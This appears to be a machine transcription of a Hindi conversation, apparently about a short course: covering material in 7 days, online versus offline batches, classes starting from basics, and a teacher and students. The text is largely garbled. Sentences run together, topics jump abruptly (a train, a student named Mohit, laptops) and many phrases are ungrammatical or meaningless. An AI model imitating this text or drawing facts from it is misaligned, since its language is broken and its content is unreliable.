हाँ यस सर इसको अरे 7 दिन में कवर होगा तो यहाँ से जाएगा यहाँ से। ठीक है 7 दिन में हो जाएगा। करवाना तो 2 दिन में देंगे बाकी वैसे बताओ लोग बताओ पर जॉब में जाना से समझ आता है। आप पहले ट्रेन में पकड़े गए। ये खाता में ये भाई आपके टीचर क्लास की बड़ी बड़ी है क्या आपके टीचर क्लास भाई वही टीचर क्लास टोटली 5-6 क्लास में अब तक भी वही है। क्लास नहीं होती है, आपका एक ही क्लास होती है। क्लास में मोहित नहीं हुआ था। एकदम श्योरली आज कंफर्म कर मैं वही कह रहा हूं क्लास ही नहीं पर ये सप्ताह में इसका है ना। हां भाई अपने 7 दिन का अवसर है तो फिर नहीं छोड़ 7 दिन में तो लगता है कि 7 दिन में ना पढ़ देगा वो। एक चीज और क्या बोलते हैं कि जैसे कि ऑनलाइन जो आप बता रहे हो ऑनलाइन ठीक है तो 3-15 लोग जाएंगे ना तो वो ऑफलाइन ठीक है आपने ज्यादा मतलब प्रॉब्लम होता है एडिट कर दो द्वारा सीएस पढ़ के मतलब स्टार्टिंग नॉर्मल क्लास एक बेसिक से स्टार्ट होगी ठीक है कि आता है हो जाए कोई फर्क नहीं, ठीक अच्छी है। हाँ नहीं जैसे जिसको लगता है कि हम आगे निकल चुके हैं वो लैपटॉप में अपना स्टार्ट कर रहे हैं तो इसे अभी तो आधे से ज़्यादा अपना काम ही कर रहे हैं सब कुछ एक सप्ताह में वही
मैं थोड़ी करूंगा सर सर बोल रहा है आप कहते हैं कि ये सब समझ रहा होगा, तो ये समझ रहा होगा, ये तो सब नहीं समझ रहा होगा, किसकी